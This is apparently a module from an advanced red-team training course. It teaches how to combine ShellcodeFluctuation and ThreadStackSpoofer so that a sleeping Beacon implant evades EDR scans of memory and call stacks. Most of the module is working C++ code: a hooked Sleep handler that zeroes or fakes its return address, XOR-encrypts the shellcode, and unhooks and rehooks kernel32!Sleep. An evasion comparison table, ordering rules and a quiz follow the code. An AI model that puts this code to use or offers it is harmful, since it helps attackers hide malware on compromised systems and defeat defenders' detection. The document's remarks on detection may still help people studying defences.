Difficulty: Advanced

Module 7: Thread Stack Spoofing Integration

Combining ShellcodeFluctuation with ThreadStackSpoofer for dual-layer evasion — encrypted memory AND clean call stacks.

Module Objective

Understand the call stack detection vector that ShellcodeFluctuation alone does not address, how ThreadStackSpoofer (also by mgeeky) overwrites the return address to terminate stack unwinding, how both techniques integrate through their shared Sleep hook architecture, and the combined evasion profile.

1. The Call Stack Detection Vector

Even with ShellcodeFluctuation encrypting memory and removing the Sleep hook during the idle window, one IOC remains: the thread call stack. When a thread is sleeping, its call stack reveals the chain of function calls that led to the sleep:

// Typical call stack of a sleeping Beacon thread WITHOUT stack spoofing:
//
// ntdll!NtDelayExecution          <-- kernel wait
// ntdll!RtlDelayExecution         <-- internal delay
// KERNELBASE!SleepEx              <-- SleepEx wrapper
// kernel32!Sleep                  <-- Sleep API
// 0x000001A0004532                <-- MySleep (in loader memory)
// 0x000001A00023A8                <-- Beacon shellcode (SUSPICIOUS!)
// 0x000001A00001C0                <-- Beacon entry point (SUSPICIOUS!)
// ntdll!RtlUserThreadStart        <-- thread start
//
// Frames 0x1A00... point to private, non-image memory
// This is a strong IOC: legitimate threads have call stacks
// pointing only to loaded DLLs (image-backed memory)

Why This Matters

Security tools like Process Hacker, Moneta, and EDR products can walk thread call stacks using StackWalk64 or RtlVirtualUnwind. Return addresses pointing to private (non-image) memory are strong indicators of injected code. ShellcodeFluctuation encrypts the memory content, but the return addresses on the stack still point to the shellcode allocation's address range.

2. ThreadStackSpoofer Concept

ThreadStackSpoofer (by mgeeky / Mariusz Banach) addresses the call stack IOC by overwriting the return address that traces back to the shellcode with a null value, effectively terminating the stack walk:

Stack Before vs After Spoofing

Before
Stack shows full chain:
Sleep → MySleep → Beacon

spoof →

After
Stack terminates early:
Sleep → MySleep → 0x0

The key mechanism is simple: overwrite the return address of the hook handler frame so that stack unwinding cannot reach the shellcode frames below:

// ThreadStackSpoofer core mechanism
void WINAPI MySleep_WithStackSpoof(DWORD dwMilliseconds) {
    // _AddressOfReturnAddress() returns a pointer to the
    // return address stored on the stack for THIS function.
    // This return address points back into the Beacon shellcode.
    auto overwrite = (PULONG_PTR)_AddressOfReturnAddress();

    // Save the original return address (we need it to get back!)
    const auto origReturnAddress = *overwrite;

    // Overwrite with 0 - stack unwinding will stop here
    *overwrite = 0;

    // ... perform Sleep (stack now looks clean) ...

    // Restore original return address before returning
    *overwrite = origReturnAddress;
}

3. How _AddressOfReturnAddress Works

_AddressOfReturnAddress() is an MSVC compiler intrinsic that returns a pointer to the location on the stack where the return address is stored for the current function. This is the value that RET will pop when the function returns:

// Stack layout when MySleep is called:
//
// Higher addresses (top of stack diagram)
// +--------------------------+
// | Beacon shellcode frame   |  <-- caller of Sleep
// +--------------------------+
// | Return addr to Beacon    |  <-- THIS is what _AddressOfReturnAddress points to
// +--------------------------+
// | MySleep local variables  |
// +--------------------------+
// | Return addr to MySleep   |  <-- for functions MySleep calls
// +--------------------------+
// | Sleep/SleepEx frame      |
// +--------------------------+
// Lower addresses (bottom of stack)
//
// By overwriting "Return addr to Beacon" with 0:
// Stack walkers see: Sleep -> MySleep -> 0x0 (end)
// They never see the Beacon frames below

Why Not Overwrite More Frames?

Overwriting just the single return address is sufficient because stack unwinding algorithms (RtlVirtualUnwind on x64) stop when they encounter a null return address or a frame that cannot be unwound. Setting one frame to 0 terminates the entire walk. Additional frames below it are invisible to the scanner.

4. Integrating Both Techniques

ShellcodeFluctuation and ThreadStackSpoofer share the same hook point (kernel32!Sleep) and the same author. Combining them is architecturally straightforward — both sets of operations happen in the same MySleep handler:

void WINAPI MySleep_Combined(DWORD dwMilliseconds) {
    // ========================================
    // STACK SPOOFING: Save and overwrite return address
    // ========================================
    auto overwrite = (PULONG_PTR)_AddressOfReturnAddress();
    const auto origReturnAddress = *overwrite;
    *overwrite = 0;  // Terminate stack walk

    // ========================================
    // FLUCTUATION: Encrypt shellcode memory
    // ========================================
    DWORD oldProt;
    VirtualProtect(g_state.shellcodeBase, g_state.shellcodeSize,
                   PAGE_READWRITE, &oldProt);
    xor32((BYTE*)g_state.shellcodeBase, g_state.shellcodeSize,
          g_state.xorKey);

    // ========================================
    // UNHOOK: Clean kernel32!Sleep
    // ========================================
    DWORD hookProt;
    VirtualProtect(g_state.sleepFunc, g_state.hookSize,
                   PAGE_EXECUTE_READWRITE, &hookProt);
    memcpy(g_state.sleepFunc, g_state.originalBytes, g_state.hookSize);
    VirtualProtect(g_state.sleepFunc, g_state.hookSize,
                   hookProt, &hookProt);

    // ========================================
    // SLEEP: Maximum stealth state
    // ========================================
    // At this point:
    //   - Shellcode memory: RW + encrypted (invisible)
    //   - Call stack: terminates at 0 (no shellcode refs)
    //   - kernel32!Sleep: unhooked (clean)
    Sleep(dwMilliseconds);

    // ========================================
    // REHOOK: Reinstall Sleep interception
    // ========================================
    VirtualProtect(g_state.sleepFunc, g_state.hookSize,
                   PAGE_EXECUTE_READWRITE, &hookProt);
    memcpy(g_state.sleepFunc, g_state.hookBytes, g_state.hookSize);
    VirtualProtect(g_state.sleepFunc, g_state.hookSize,
                   hookProt, &hookProt);

    // ========================================
    // FLUCTUATION: Decrypt shellcode memory
    // ========================================
    xor32((BYTE*)g_state.shellcodeBase, g_state.shellcodeSize,
          g_state.xorKey);
    VirtualProtect(g_state.shellcodeBase, g_state.shellcodeSize,
                   PAGE_EXECUTE_READ, &oldProt);

    // ========================================
    // STACK RESTORE: Put back original return address
    // ========================================
    *overwrite = origReturnAddress;

    // Return to Beacon - execution continues normally
}

5. Dual-Layer Evasion Profile

When both techniques are active during the sleep window, the evasion profile is significantly stronger than either technique alone:

Detection Vector	Fluctuation Only	Stack Spoof Only	Combined
Private executable memory	Evaded (RW during sleep)	Not addressed	Evaded
Shellcode signatures	Evaded (encrypted)	Not addressed	Evaded
Beacon config patterns	Evaded (XOR32)	Not addressed	Evaded
Call stack to private memory	Not addressed	Evaded (return addr = 0)	Evaded
Sleep hook in kernel32	Evaded (unhook during sleep)	Not addressed	Evaded
Thread start address	Not addressed	Not addressed	Not addressed
kernel32 private pages (CoW)	Partially addressed	Not relevant	Partially addressed

Remaining IOCs

Even with both techniques, the thread's start address still points to private memory (the CreateThread target). This is a fundamental IOC that cannot be addressed by post-creation techniques. Solutions include starting the thread on a legitimate DLL function and redirecting via APC, or using thread pool callbacks.

6. Ordering Considerations

The combined approach has specific ordering requirements for the stack spoofing operations:

Operation Order

Spoof stack FIRST — overwrite the return address before any operations that might be observed. A scanner running between steps sees a clean stack from the earliest possible moment
Encrypt shellcode — now the memory content is hidden
Unhook Sleep — remove the last easily-visible IOC
Sleep — in the maximally hidden state
Rehook Sleep — prepare for next cycle
Decrypt shellcode — restore executable content
Restore stack LAST — the return address must be valid for the RET instruction

Restoring the return address must happen last, just before the function returns. If it were restored before decryption, a scanner could briefly see the return address pointing to shellcode memory. If it were never restored, the function would return to address 0 and crash.

7. Advanced Stack Spoofing Considerations

The basic *overwrite = 0 approach has a weakness: a zero return address is itself anomalous. More sophisticated approaches create a fake but plausible call stack:

// Advanced: Spoof with a plausible return address
// Instead of 0, use an address inside a legitimate DLL

void WINAPI MySleep_AdvancedSpoof(DWORD dwMilliseconds) {
    auto overwrite = (PULONG_PTR)_AddressOfReturnAddress();
    const auto origReturnAddress = *overwrite;

    // Option 1: Use a known-good return address
    // e.g., inside ntdll!RtlUserThreadStart
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    FARPROC threadStart = GetProcAddress(hNtdll, "RtlUserThreadStart");
    *overwrite = (ULONG_PTR)threadStart;

    // Now the stack looks like:
    // Sleep -> MySleep -> RtlUserThreadStart (legitimate!)
    // This is a common legitimate call chain.

    // ... fluctuation + sleep ...

    *overwrite = origReturnAddress;
}

// Option 2: Craft a complete fake frame chain
// This requires understanding x64 unwind metadata and
// creating synthetic RUNTIME_FUNCTION entries, which is
// significantly more complex (see SilentMoonwalk, Unwinder)

Call Stack Validation

Modern EDR solutions are becoming more sophisticated at validating call stacks. They may verify that return addresses correspond to valid CALL instruction targets, check unwind metadata consistency, or compare stacks against known-good patterns. Simple spoofing (setting return to 0 or a random DLL address) may be detected by these advanced techniques. Full call stack fabrication (as in SilentMoonwalk) is significantly more complex but more robust.

8. Implementation Notes and Caveats

Practical Considerations

Topic	Details
Compiler optimization	`_AddressOfReturnAddress()` requires that the function has a standard stack frame. Aggressive inlining or frame pointer omission can break it. Compile with `/Oy-` (do not omit frame pointers) or use `#pragma optimize("", off)`
x64 unwind info	x64 Windows uses table-based exception handling. The stack spoof works because stack walkers rely on return addresses for unwinding. Setting a return address to 0 causes the unwind to terminate gracefully
Debug builds	Debug builds add stack cookies and additional frame metadata. Stack spoofing works in both Debug and Release builds, but the stack layout differs
Thread count	Both techniques operate per-thread. If the implant spawns worker threads, each thread that calls Sleep will trigger its own fluctuation+spoof cycle
Non-Sleep waits	If the implant uses `WaitForSingleObject` or `WaitForMultipleObjects` instead of `Sleep`, those functions would also need to be hooked for complete coverage

Same Author, Same Architecture

A key advantage of combining ShellcodeFluctuation and ThreadStackSpoofer is that both tools were designed by the same author (mgeeky) with integration in mind. They share the same hooking architecture (inline hook on kernel32!Sleep), the same loader pattern (VirtualAlloc + memcpy + CreateThread), and compatible state management. Merging them into a single MySleep handler is a natural architectural fit.

Knowledge Check

Q1: What detection vector does ThreadStackSpoofer address that ShellcodeFluctuation does not?

A) Executable private memory

B) Thread call stacks showing return addresses in private (non-image) memory

C) RWX page permissions

D) XOR-encrypted memory regions

Q2: How does ThreadStackSpoofer terminate the stack walk?

A) It deletes all stack frames below the current function

B) It hooks RtlVirtualUnwind to skip shellcode frames

C) It moves the thread's stack pointer to a different memory region

D) It overwrites the return address (pointing to shellcode) with 0, causing the unwinder to stop

Q3: Why must the original return address be restored LAST, just before MySleep returns?

A) Windows requires a non-zero return address for thread scheduling

B) The XOR decryption uses the return address as a key

C) The RET instruction needs the valid return address to transfer control back to the shellcode

D) The Sleep API checks the return address for validation

← Prev: Shellcode Region Tracking Next: Full Chain, Detection & Comparison →